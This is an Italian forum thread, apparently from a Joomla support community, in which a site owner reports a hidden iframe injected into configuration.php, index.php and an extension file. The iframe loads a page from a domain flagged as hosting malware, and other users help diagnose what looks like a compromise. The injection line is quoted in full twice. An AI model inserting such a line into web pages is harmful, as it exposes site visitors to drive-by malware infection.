Problema di sicurezza sulla 1.5.15

[ryche74]

Il seguente messaggio  scritto sul fle configuration

<iframe src="http://www.maas.cl/images/index.php" style="display:none"></iframe>

rende il sito inaccessibile

col seguente messaggio:

Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!
The website at www.xxxxxxxxx.com contains elements from the site www.maas.cl, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
Per maggiori informazioni sui problemi riscontrati per questi elementi, visita la pagina Pagina di diagnostica Navigazione sicura. di www.maas.cl.
Scopri come proteggere il tuo computer dai software dannosi presenti sulla Rete.

[lucabensi]

Ciao.
Non ho capito dove hai inserito quel codice (forse in un articolo?).
In ogni caso, il problema non è determinato da Joomla, ma dal fatto che maas.cl è nella lista stilata da Google dei siti infettati da malware: per verificarlo prova ad accedervi direttamente usando firefox con i filtri di Google attivati (lo sono di default).
Che browser ti manifesta l'errore?
Il messaggio ti segnala che il sito contiene qualcosa proveniente da un sito infetto, e quindi rischi di essere infettato da quel qualcosa.
Luca

[ryche74]

Ciao.
Il codice 
<iframe src="http://www.maas.cl/images/index.php" style="display:none"></iframe>
l'ho trovato nel fiel configuration.php e appena rimosso  il sito è tornato ok

Il messaggio  "Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!"   etc. etc.
lo trovo non appena tento di entrare nel sito.
Con Firefox non si manifesta
Con Chrome e Safari sì. Explorer non ho ancora provato ma perchè uso MAC.


ps: cosa intendi quando dici  "dove hai inserito quel codice (forse in un articolo?)." !?!?!

[ostyle17]

Per quanto ne so io, nel file configuration.php non dovrebbero essere presenti iframe.

[mau_develop]

mi dici anche che extensions hai installato?

M.

ps: c'è una sez sicurezza e con un post uguale al tuo

[ryche74]

Già ma la riga di codice sul file configuration era lì...

e in certi siti anche sull'index.php   della root

L'extension installata era  RAF CLOUD  e ho trovato la stessa riga di codice "i frame" sul file  runlog.php

Una cosa mai vista.... 

[mau_develop]

solo quella?

altre cose oltre al joomla base?... galleria?

M.

[lucabensi]

ps: cosa intendi quando dici  "dove hai inserito quel codice (forse in un articolo?)." !?!?!

Parlavo di articoli perché mi sembrava strano trovarlo nel configuration.php, dove non dovrebbe proprio essere.
Sembra quasi un attacco...
Luca

[ryche74]

Ho fatto uno screen shot del file configuration

http://img85.imageshack.us/i/configuration.png/

Un attacco???  E come scusa?   Server aggiornatissimo. Joomla aggiornato. Extension aggiornate. Permessi sulle cartelle rigorosamente controllati a 755 e configuaration a  644. Password ftp alfanumeriche lunghissime   

Dovrei averlo fatto io 

[Duilio76]

Un iframe nel configuration.php? Andiamo bene!

[ryche74]

Scusate, avete news e/o avete indagato sul problema?